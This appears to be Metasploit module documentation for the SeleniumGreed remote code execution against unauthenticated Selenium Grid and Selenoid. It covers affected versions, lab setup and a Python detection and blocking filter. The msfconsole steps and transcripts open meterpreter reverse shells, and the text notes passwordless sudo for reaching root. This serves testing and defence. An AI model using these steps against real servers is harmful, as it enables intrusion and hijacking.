metasploit-gs/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce.md
2026-02-21 12:34:09 +01:00

## Vulnerable Application

Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication (the default for both), an attacker can create a Chrome session with a custom binary path via the `binary` field of `goog:chromeOptions`, replacing the Chrome binary with an interpreter such as Python to achieve arbitrary command execution.

This technique was documented by Wiz Research as "SeleniumGreed" and has been observed in real-world cryptomining campaigns targeting exposed Selenium Grid instances.

The default Docker images run the browser as an unprivileged user (`seluser` for Selenium Grid, `selenium` for Selenoid) which has passwordless sudo, allowing trivial privilege escalation to root.

The vulnerability affects:

* Selenium Grid < 4.11.0 (stereotype capabilities merge was introduced in 4.11.0, preventing binary override)
* Selenoid - all versions (capabilities are proxied to ChromeDriver without filtering, project archived December 2024)
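The capability that carries the override is easy to spot in a WebDriver new-session request, so an operator who cannot upgrade (or who runs Selenoid, which never received a fix) can reject it at a reverse proxy in front of the grid. The following is an added example, not code from the Metasploit module or from Selenium/Selenoid: it parses the `POST /session` JSON body in the shapes the WebDriver protocol uses (W3C `capabilities.alwaysMatch` / `firstMatch` and the legacy `desiredCapabilities` object) and flags any `goog:chromeOptions.binary` entry. The log format and the sample requests are constructed for the example; the proxy integration point and the assumption that the proxy sees the raw request body are mine.

```python
import json

# WebDriver new-session endpoints seen in the wild: "/session" (Grid 4, Selenoid)
# and the older "/wd/hub/session" prefix. Assumption: the proxy normalises paths.
SESSION_SUFFIX = "/session"


def _capability_sets(body):
    """Yield every capability object a new-session request can carry.

    W3C form:    {"capabilities": {"alwaysMatch": {...}, "firstMatch": [{...}, ...]}}
    Legacy form: {"desiredCapabilities": {...}}
    Both forms may appear in one request, so all of them are inspected.
    """
    caps = body.get("capabilities")
    if isinstance(caps, dict):
        always = caps.get("alwaysMatch")
        if isinstance(always, dict):
            yield always
        for first in caps.get("firstMatch") or []:
            if isinstance(first, dict):
                yield first
    legacy = body.get("desiredCapabilities")
    if isinstance(legacy, dict):
        yield legacy


def find_binary_override(body_text):
    """Return the list of binary paths requested via goog:chromeOptions.binary.

    An empty list means the request does not try to replace the Chrome binary.
    Malformed JSON is treated as "nothing found"; a stricter deployment might
    reject it outright.
    """
    try:
        body = json.loads(body_text)
    except json.JSONDecodeError:
        return []
    if not isinstance(body, dict):
        return []
    found = []
    for caps in _capability_sets(body):
        opts = caps.get("goog:chromeOptions")
        if isinstance(opts, dict) and "binary" in opts:
            found.append(str(opts["binary"]))
    return found


def should_block(method, path, body_text):
    """Policy hook for a reverse proxy: block new-session requests that set a binary."""
    if method.upper() != "POST" or not path.rstrip("/").endswith(SESSION_SUFFIX):
        return False
    return bool(find_binary_override(body_text))


def scan_request_log(lines):
    """Run the policy over constructed 'METHOD PATH BODY' log lines.

    Returns (line_index, [binary paths]) for every request that would be blocked,
    which is the same signal a detection rule would alert on.
    """
    flagged = []
    for idx, line in enumerate(lines):
        parts = line.split(" ", 2)
        if len(parts) != 3:
            continue
        method, path, body = parts
        hits = find_binary_override(body)
        if should_block(method, path, body):
            flagged.append((idx, hits))
    return flagged


# Constructed sample traffic: one benign session, one override in the W3C
# alwaysMatch block, one override in the legacy desiredCapabilities block,
# and one override sent to a non-session endpoint (ignored by the policy).
SAMPLE_LOG = [
    'POST /wd/hub/session {"capabilities": {"alwaysMatch": {"browserName": "chrome"}}}',
    'POST /session {"capabilities": {"alwaysMatch": {"browserName": "chrome", '
    '"goog:chromeOptions": {"binary": "/usr/bin/python3", "args": ["-c", "..."]}}}}',
    'POST /session {"desiredCapabilities": {"browserName": "chrome", '
    '"goog:chromeOptions": {"binary": "/usr/bin/perl"}}}',
    'GET /status {}',
]

if __name__ == "__main__":
    for idx, hits in scan_request_log(SAMPLE_LOG):
        print(f"line {idx}: would block new session, binary override -> {hits}")
```

`should_block` is the piece to wire into whatever proxy or admission layer sits in front of port 4444; `scan_request_log` shows the same check applied retrospectively to captured traffic, which is how the cryptomining campaigns Wiz described would show up in an access log that retains request bodies.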

This module was successfully tested on:

* selenium/standalone-chrome:4.1.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-chrome:4.10.0 installed with Docker on Ubuntu 24.04
* Selenoid 1.11.3 with selenoid/chrome:128.0 installed with Docker on Ubuntu 24.04

## Installation (Selenium Grid)

  1. `docker pull selenium/standalone-chrome:4.10.0`
  2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-chrome:4.10.0`

## Installation (Selenoid)

  1. Create `browsers.json`:

```json
{
  "chrome": {
    "default": "128.0",
    "versions": {
      "128.0": {
        "image": "selenoid/chrome:128.0",
        "port": "4444",
        "path": "/"
      }
    }
  }
}
```

  2. `docker pull selenoid/chrome:128.0`
  3. Start Selenoid:

```
docker run -d -p 4444:4444 -e DOCKER_API_VERSION=1.44 \
  -v $(pwd)/browsers.json:/etc/selenoid/browsers.json:ro \
  -v /var/run/docker.sock:/var/run/docker.sock \
  aerokube/selenoid:latest-release
```

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/linux/http/selenium_greed_chrome_rce`
  4. Do: `set RHOSTS <rhost>`
  5. Do: `set LHOST <lhost>`
  6. Do: `run`
  7. You should get a session

## Options

No non-standard options.

## Scenarios

### Selenium Grid - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04

```
msf6 > use exploit/linux/http/selenium_greed_chrome_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LPORT 4454
LPORT => 4454
msf6 exploit(linux/http/selenium_greed_chrome_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4454
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.10.0 detected (vulnerable to binary override)
[*] Sending session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.5
[*] Meterpreter session 1 opened (172.17.0.1:4454 -> 172.17.0.5:34580) at 2026-02-21 12:32:50 +0100

meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer     : 172.17.0.5
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```

### Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04

```
msf6 > use exploit/linux/http/selenium_greed_chrome_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LPORT 4453
LPORT => 4453
msf6 exploit(linux/http/selenium_greed_chrome_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4453
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable to binary override)
[*] Sending session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.10
[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984) at 2026-02-21 12:32:25 +0100

meterpreter > getuid
Server username: selenium
meterpreter > sysinfo
Computer     : 669a719f93da
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```